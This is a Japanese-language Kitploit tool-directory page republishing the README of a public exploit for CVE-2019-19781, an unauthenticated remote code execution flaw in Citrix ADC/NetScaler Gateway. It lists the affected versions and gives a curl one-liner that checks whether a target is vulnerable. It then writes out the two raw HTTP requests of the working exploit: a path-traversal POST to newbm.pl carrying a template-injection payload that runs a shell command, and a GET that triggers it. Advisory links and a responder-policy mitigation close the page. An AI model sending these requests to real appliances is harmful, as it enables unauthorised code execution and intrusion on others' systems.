Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mpgn/cve-2019-19781
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストインシデントレスポンスリモートアクセスツール
GitHubmpgn/cve-2019-19781

CVE-2019-19781

CVE-2019-19781 - Citrix ADC Netscaler におけるリモートコード実行エクスプロイト

リポジトリを見る
157345年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-19781

Citrix Application Delivery Controller および Citrix Gateway におけるリモートコード実行 (RCE)

Citrix Application Delivery Controller(ADC、旧 NetScaler ADC)および Citrix Gateway(旧 NetScaler Gateway)に脆弱性が確認されました。この脆弱性が悪用された場合、認証されていない攻撃者が任意のコード実行を行う可能性があります。

追記: Fireeye による CVE-2019-19781 の侵害指標(IOC)スキャナー -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/

影響を受ける製品:

  • Citrix ADC および Citrix Gateway バージョン 13.0 のサポート対象の全ビルド
  • Citrix ADC および NetScaler Gateway バージョン 12.1 のサポート対象の全ビルド
  • Citrix ADC および NetScaler Gateway バージョン 12.0 のサポート対象の全ビルド
  • Citrix ADC および NetScaler Gateway バージョン 11.1 のサポート対象の全ビルド
  • Citrix NetScaler ADC および NetScaler Gateway バージョン 10.5 のサポート対象の全ビルド

image

脆弱性の確認

root@kitploit:~
TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET”

脆弱な Perl スクリプト

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl

エクスプロイト

この脆弱性は、認証なしでわずか 2 つのリクエストだけで悪用できます !

1 つ目のリクエスト:

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103

url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb

2 つ目のリクエスト:

root@kitploit:~
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

image

詳細な分析(英語):

  • Craig Young => https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
  • @MDSecLabs => https://www.mdsec.co.uk/2020/01/deep-dive-in-to-citrix-adc-remote-code-execution-cve-2019-19781/
  • @mpgn_x64 => https://twitter.com/mpgn_x64/status/1214544993261674497

セキュリティアドバイザリ:

  • https://support.citrix.com/article/CTX267027

パッチ(実際のパッチではありません)

  • https://support.citrix.com/article/CTX267679
root@kitploit:~
enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config 
ツールをダウンロード